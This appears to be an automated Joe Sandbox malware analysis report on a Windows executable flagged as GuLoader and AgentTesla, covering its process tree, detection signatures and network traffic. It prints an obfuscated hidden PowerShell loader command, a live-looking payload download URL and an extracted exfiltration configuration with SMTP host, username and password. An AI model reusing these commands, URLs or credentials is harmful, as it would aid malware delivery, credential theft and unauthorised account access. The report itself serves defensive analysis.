Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hnTW5HdWvY.exe

Overview

General Information

Sample name:hnTW5HdWvY.exe
renamed because original name is a hash value
Original sample name:6827f81b3add0570684d911484c7c3a75f4d565123261d4173306ab35e998494.exe
Analysis ID:1420850
MD5:d32a9f003d7d44f7839d1e73ab0880dc
SHA1:600da56efcbe1f1ecfbf984b6f7f1103e067e43d
SHA256:6827f81b3add0570684d911484c7c3a75f4d565123261d4173306ab35e998494
Tags:exe
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Obfuscated command line found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Suspicious Outbound SMTP Connections
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • hnTW5HdWvY.exe (PID: 6748 cmdline: "C:\Users\user\Desktop\hnTW5HdWvY.exe" MD5: D32A9F003D7D44F7839D1E73AB0880DC)
    • powershell.exe (PID: 4320 cmdline: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7220 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 7456 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.legodimo.co.za", "Username": "info@legodimo.co.za", "Password": "IFfo%142#"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000001.00000002.2018427169.0000000008E2F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: wab.exe PID: 7456JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4320, TargetFilename: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4320, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7220, ProcessName: cmd.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 41.76.215.87, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 7456, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", CommandLine: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hnTW5HdWvY.exe", ParentImage: C:\Users\user\Desktop\hnTW5HdWvY.exe, ParentProcessId: 6748, ParentProcessName: hnTW5HdWvY.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", ProcessId: 4320, ProcessName: powershell.exe
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: hnTW5HdWvY.exeAvira: detected
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exeAvira: detection malicious, Label: HEUR/AGEN.1338492
            Source: conhost.exe.3004.2.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.legodimo.co.za", "Username": "info@legodimo.co.za", "Password": "IFfo%142#"}
            Source: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exeReversingLabs: Detection: 50%
            Source: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exeVirustotal: Detection: 60%Perma Link
            Source: hnTW5HdWvY.exeReversingLabs: Detection: 50%
            Source: hnTW5HdWvY.exeVirustotal: Detection: 50%Perma Link
            Source: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exeJoe Sandbox ML: detected
            Source: hnTW5HdWvY.exeJoe Sandbox ML: detected
            Source: hnTW5HdWvY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 102.67.137.82:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbC:4 source: powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2017911817.00000000081B4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000001.00000002.2017782713.0000000008175000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2015644677.000000000726A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbS source: powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071CB000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_00405E7E FindFirstFileA,FindClose,0_2_00405E7E
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_0040543A GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040543A
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: global trafficTCP traffic: 192.168.2.4:49739 -> 41.76.215.87:587
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 102.67.137.82 102.67.137.82
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficTCP traffic: 192.168.2.4:49739 -> 41.76.215.87:587
            Source: global trafficHTTP traffic detected: GET /dKatzZJXqh143.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: lifeartfertility.co.zaCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /dKatzZJXqh143.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: lifeartfertility.co.zaCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: lifeartfertility.co.za
            Source: powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: wab.exe, 00000005.00000002.2869316085.0000000020591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: wab.exe, 00000005.00000002.2869316085.0000000020591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: wab.exe, 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.00000000205E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://legodimo.co.za
            Source: wab.exe, 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.00000000205E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.legodimo.co.za
            Source: hnTW5HdWvY.exe, hnTW5HdWvY.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: hnTW5HdWvY.exe, hnTW5HdWvY.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2011308617.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.0000000007210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2011308617.0000000004A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBqq
            Source: wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.0000000007210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lifeartfertility.co.za/
            Source: wab.exe, 00000005.00000002.2857936435.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lifeartfertility.co.za/dKatzZJXqh143.bin
            Source: wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lifeartfertility.co.za/dKatzZJXqh143.bind
            Source: wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lifeartfertility.co.za/o
            Source: powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownHTTPS traffic detected: 102.67.137.82:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_00404FA3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FA3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exeJump to dropped file
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030CB
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile created: C:\Windows\oprykningensJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile created: C:\Windows\oprykningens\PatriciatesJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_004047E20_2_004047E2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0489F4F81_2_0489F4F8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0489EDB01_2_0489EDB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00A7B7B05_2_00A7B7B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00A74AC05_2_00A74AC0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00A7EB605_2_00A7EB60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00A73EA85_2_00A73EA8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00A7EF105_2_00A7EF10
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00A741F05_2_00A741F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233C27945_2_233C2794
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233C39B05_2_233C39B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233C2CE05_2_233C2CE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233C2CD35_2_233C2CD3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233C39DB5_2_233C39DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233D62285_2_233D6228
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233DB2595_2_233DB259
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233D51E05_2_233D51E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233D30A05_2_233D30A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233D23795_2_233D2379
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233DE3E85_2_233DE3E8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233D72E05_2_233D72E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_233D590F5_2_233D590F
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: fontext.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: fms.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
